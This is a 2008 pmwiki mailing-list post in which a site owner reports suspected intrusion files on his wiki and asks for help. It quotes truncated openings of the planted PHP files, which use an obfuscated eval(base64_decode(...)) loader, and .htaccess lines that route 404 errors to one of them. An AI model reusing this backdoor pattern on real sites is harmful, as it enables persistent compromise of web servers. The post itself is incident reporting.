[pmwiki-users] Security breach?

James M jamesm1415 at googlemail.com
Sun Dec 21 16:45:59 CST 2008


I've just found that there are also similar mystery php files in the
 pub/skins/W directory - and this does not have 777 permissions.
And the extra link had been written to W.tmpl in that skins directory.

How could that happen?  It certainly wasn't me, and I'm the only one who
knows the admin password! And the only one who has (legal) access to the
unix directories on the host.

Any comments?

Thanks,    James



> Hi
> I have found some mysterious files on my small (8 pages) pmwiki site which
> appear to compromise the security. The site uses AuthUser, with only 2
> authorised users.
>
> I only found this by chance as one of the pages has a link which was not
> inserted by either of us (and points apparently to some driver download at a
> url that no longer exists; it looks like it has nothing to do with the
> domain so was probably planted by a hacker? was it a virus?).
>
> Anyway, the mysterious files are five almost identical php files, one in
> wiki.d, two in uploads and two in uploads/W (wiki.d and uploads are of
> course the two directories with 777 permissions), and htaccess files in
> uploads and uploads/W
>
> The php files are of the order of 18kb, and begin with
> for wiki.d/remote.php and uploads/configs.php and uploads/W/guest.php:
> <?php
> error_reporting(0);$p="eval(base64_decode(Y2xhc3MgbmV3aHR0cHsNCnByb3RlY3Rl.......................
>
> and in the case of uploads/includes.php and uploads/W/messages.php:
> <?php
> error_reporting(0);$s="e";$p="bafhezzazbzcea";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnByb3RlY3Rl................
>
> the .htaccess files in the uploads and the uploads/W directories both read,
>
> Options -MultiViews
> ErrorDocument 404 path-to-pmwiki/uploads/includes.php
>
>
> How could these have got there?  Any suggestions?  Has anyone else had a
> similar experience?
>
> Thanks,
>
>     James
>
> The site is running pmwiki-2.2.0-beta65
>
> ps in the meantime I've changed the permissions on wiki.d and uploads to
> 755, but that's obviously not very satisfactory
>
> pps I've also just noticed there's an empty directory in the pmwiki
> directory called cgi-bin.  I don't think it's usually there is it?
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://www.pmichaud.com/pipermail/pmwiki-users/attachments/20081221/ea405954/attachment-0001.html 


More information about the pmwiki-users mailing list